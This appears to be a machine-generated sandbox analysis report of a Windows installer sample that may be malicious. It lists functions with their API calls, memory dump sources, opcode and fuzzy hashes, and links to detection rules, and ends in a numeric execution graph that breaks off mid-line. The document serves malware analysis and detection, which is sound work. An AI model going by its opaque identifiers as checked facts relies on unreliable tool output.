                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                                                    Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                    • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                                                    Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                                    • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                                                    Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                                    • String ID: !N~
                                                                                                                                                                                                                                                                                                    • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                                    • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                                                    Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                    • String ID: Error launching installer
                                                                                                                                                                                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                                    • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                                                    Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                    • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                    • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                                                    • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                                                    Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                                    • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                                    Execution Coverage:3.4%
                                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                    Signature Coverage:3.6%
                                                                                                                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:58
                                                                                                                                                                                                                                                                                                    execution_graph 104925 a1f4c0 104928 a2a025 104925->104928 104927 a1f4cc 104929 a2a046 104928->104929 104934 a2a0a3 104928->104934 104931 a20340 206 API calls 104929->104931 104929->104934 104935 a2a077 104931->104935 104932 a6806b 104932->104932 104933 a2a0e7 104933->104927 104934->104933 104937 a83fe1 81 API calls __wsopen_s 104934->104937 104935->104933 104935->104934 104936 a1bed9 8 API calls 104935->104936 104936->104934 104937->104932 104938 a61ac5 104939 a61acd 104938->104939 104942 a1d535 104938->104942 104969 a77a87 8 API calls __fread_nolock 104939->104969 104941 a61adf 104970 a77a00 8 API calls __fread_nolock 104941->104970 104944 a3014b 8 API calls 104942->104944 104946 a1d589 104944->104946 104945 a61b09 104947 a20340 206 API calls 104945->104947 104949 a1c32d 8 API calls 104946->104949 104948 a61b30 104947->104948 104950 a61b44 104948->104950 104971 a961a2 53 API calls _wcslen 104948->104971 104952 a1d5b3 104949->104952 104953 a3014b 8 API calls 104952->104953 104960 a1d66e messages 104953->104960 104954 a61b61 104954->104942 104972 a77a87 8 API calls __fread_nolock 104954->104972 104956 a1c3ab 8 API calls 104966 a1d9ac messages 104956->104966 104957 a1b4c8 8 API calls 104957->104960 104959 a61f79 104973 a756ae 8 API calls messages 104959->104973 104960->104957 104960->104959 104962 a61f94 104960->104962 104963 a1bed9 8 API calls 104960->104963 104964 a1c3ab 8 API calls 104960->104964 104965 a1d911 messages 104960->104965 104963->104960 104964->104960 104965->104956 104965->104966 104967 a1d9c3 104966->104967 104968 a2e30a 8 API calls messages 104966->104968 104968->104966 104969->104941 104970->104945 104971->104954 104972->104954 104973->104962 102550 a1f5e5 102553 a1cab0 102550->102553 102554 a1cacb 102553->102554 102555 a614be 102554->102555 102556 a6150c 102554->102556 102583 a1caf0 102554->102583 102559 a614c8 102555->102559 102562 a614d5 102555->102562 102555->102583 102625 a962ff 206 API calls 2 library calls 102556->102625 102623 a96790 206 API calls 102559->102623 102576 a1cdc0 102562->102576 102624 a96c2d 206 API calls 2 library calls 102562->102624 102564 a2e807 39 API calls 102564->102583 102567 a1cf80 39 API calls 102567->102583 102568 a6179f 102568->102568 102570 a1cdee 102572 a616e8 102635 a96669 81 API calls 102572->102635 102576->102570 102636 a83fe1 81 API calls __wsopen_s 102576->102636 102583->102564 102583->102567 102583->102570 102583->102572 102583->102576 102584 a20340 102583->102584 102607 a1be2d 102583->102607 102611 a2e7c1 39 API calls 102583->102611 102612 a2aa99 206 API calls 102583->102612 102613 a305b2 5 API calls __Init_thread_wait 102583->102613 102614 a2bc58 102583->102614 102619 a30413 29 API calls __onexit 102583->102619 102620 a30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102583->102620 102621 a2f4df 81 API calls 102583->102621 102622 a2f346 206 API calls 102583->102622 102626 a1b4c8 102583->102626 102630 a6ffaf 8 API calls 102583->102630 102631 a1bed9 102583->102631 102603 a20376 messages 102584->102603 102585 a305b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102585->102603 102586 a30413 29 API calls pre_c_initialization 102586->102603 102587 a6632b 102712 a83fe1 81 API calls __wsopen_s 102587->102712 102588 a3014b 8 API calls 102588->102603 102589 a21695 102594 a1bed9 8 API calls 102589->102594 102601 a2049d messages 102589->102601 102592 a65cdb 102598 a1bed9 8 API calls 102592->102598 102592->102601 102593 a6625a 102711 a83fe1 81 API calls __wsopen_s 102593->102711 102594->102601 102598->102601 102599 a1bed9 8 API calls 102599->102603 102600 a1bf73 8 API calls 102600->102603 102601->102583 102602 a66115 102709 a83fe1 81 API calls __wsopen_s 102602->102709 102603->102585 102603->102586 102603->102587 102603->102588 102603->102589 102603->102592 102603->102593 102603->102599 102603->102600 102603->102601 102603->102602 102604 a30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 102603->102604 102606 a20aae messages 102603->102606 102637 a21990 102603->102637 102699 a21e50 102603->102699 102604->102603 102710 a83fe1 81 API calls __wsopen_s 102606->102710 102608 a1be38 102607->102608 102609 a1be67 102608->102609 103520 a1bfa5 102608->103520 102609->102583 102611->102583 102612->102583 102613->102583 102615 a3014b 8 API calls 102614->102615 102616 a2bc65 102615->102616 102617 a1b329 8 API calls 102616->102617 102618 a2bc70 102617->102618 102618->102583 102619->102583 102620->102583 102621->102583 102622->102583 102623->102562 102624->102576 102625->102583 102627 a1b4d6 102626->102627 102629 a1b4dc 102626->102629 102628 a1bed9 8 API calls 102627->102628 102627->102629 102628->102629 102629->102583 102630->102583 102632 a1befc __fread_nolock 102631->102632 102633 a1beed 102631->102633 102632->102583 102633->102632 102634 a3017b 8 API calls 102633->102634 102634->102632 102635->102576 102636->102568 102638 a219b6 102637->102638 102639 a21a2e 102637->102639 102641 a219c3 102638->102641 102642 a66b60 102638->102642 102640 a66a4d 102639->102640 102658 a21a3d 102639->102658 102644 a66b54 102640->102644 102645 a66a58 102640->102645 102651 a66b84 102641->102651 102652 a219cd 102641->102652 102719 a985db 206 API calls 2 library calls 102642->102719 102718 a83fe1 81 API calls __wsopen_s 102644->102718 102717 a2b35c 206 API calls 102645->102717 102646 a20340 206 API calls 102646->102658 102649 a66bb5 102653 a66be2 102649->102653 102654 a66bc0 102649->102654 102650 a21b62 messages 102667 a219e0 messages 102650->102667 102676 a1bed9 8 API calls 102650->102676 102698 a21a23 messages 102650->102698 102651->102649 102657 a66b9c 102651->102657 102656 a1bed9 8 API calls 102652->102656 102652->102667 102722 a960e6 102653->102722 102721 a985db 206 API calls 2 library calls 102654->102721 102655 a21bb5 102655->102603 102656->102667 102720 a83fe1 81 API calls __wsopen_s 102657->102720 102658->102646 102658->102655 102659 a66979 102658->102659 102662 a66908 102658->102662 102658->102667 102677 a21ba9 102658->102677 102681 a21af4 102658->102681 102716 a83fe1 81 API calls __wsopen_s 102659->102716 102715 a83fe1 81 API calls __wsopen_s 102662->102715 102665 a66dd9 102668 a66e0f 102665->102668 102820 a981ce 65 API calls 102665->102820 102667->102665 102667->102698 102796 a9808f 53 API calls __wsopen_s 102667->102796 102675 a1b4c8 8 API calls 102668->102675 102670 a66c81 102794 a81ad8 8 API calls 102670->102794 102671 a66c08 102729 a8148b 102671->102729 102673 a66db7 102797 a18ec0 102673->102797 102675->102698 102676->102667 102677->102655 102714 a83fe1 81 API calls __wsopen_s 102677->102714 102679 a66ded 102682 a18ec0 52 API calls 102679->102682 102681->102677 102713 a21ca0 8 API calls 102681->102713 102695 a66df5 _wcslen 102682->102695 102684 a6691d messages 102684->102650 102684->102659 102684->102698 102686 a66c93 102795 a1bd07 8 API calls 102686->102795 102687 a21b55 102687->102650 102687->102677 102690 a66dbf _wcslen 102690->102665 102693 a1b4c8 8 API calls 102690->102693 102692 a66c9c 102697 a8148b 8 API calls 102692->102697 102693->102665 102695->102668 102696 a1b4c8 8 API calls 102695->102696 102696->102668 102697->102667 102698->102603 102702 a21e6d messages 102699->102702 102700 a22512 102703 a21ff7 messages 102700->102703 103519 a2be08 39 API calls 102700->103519 102702->102700 102702->102703 102705 a67837 102702->102705 102708 a6766b 102702->102708 103517 a2e322 8 API calls messages 102702->103517 102703->102603 102705->102703 103518 a3d2d5 39 API calls 102705->103518 103516 a3d2d5 39 API calls 102708->103516 102709->102606 102710->102601 102711->102601 102712->102601 102713->102687 102714->102698 102715->102684 102716->102667 102717->102650 102718->102642 102719->102667 102720->102698 102721->102667 102723 a66bed 102722->102723 102724 a96101 102722->102724 102723->102670 102723->102671 102821 a3017b 102724->102821 102727 a96123 102727->102723 102830 a3014b 102727->102830 102839 a81400 8 API calls 102727->102839 102730 a81499 102729->102730 102732 a66c32 102729->102732 102731 a3014b 8 API calls 102730->102731 102730->102732 102731->102732 102733 a22b20 102732->102733 102734 a22b61 102733->102734 102735 a22fc0 102734->102735 102736 a22b86 102734->102736 102984 a305b2 5 API calls __Init_thread_wait 102735->102984 102738 a22ba0 102736->102738 102739 a67bd8 102736->102739 102846 a23160 102738->102846 102947 a97af9 102739->102947 102740 a22fca 102751 a2300b 102740->102751 102985 a1b329 102740->102985 102743 a67be4 102743->102667 102746 a23160 9 API calls 102747 a22bc6 102746->102747 102748 a22bfc 102747->102748 102747->102751 102750 a67bfd 102748->102750 102775 a22c18 __fread_nolock 102748->102775 102749 a67bed 102749->102667 102994 a83fe1 81 API calls __wsopen_s 102750->102994 102751->102749 102752 a1b4c8 8 API calls 102751->102752 102754 a23049 102752->102754 102992 a2e6e8 206 API calls 102754->102992 102755 a22fe4 102991 a30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102755->102991 102757 a67c15 102995 a83fe1 81 API calls __wsopen_s 102757->102995 102760 a22d3f 102761 a67c78 102760->102761 102762 a22d4c 102760->102762 102997 a961a2 53 API calls _wcslen 102761->102997 102763 a23160 9 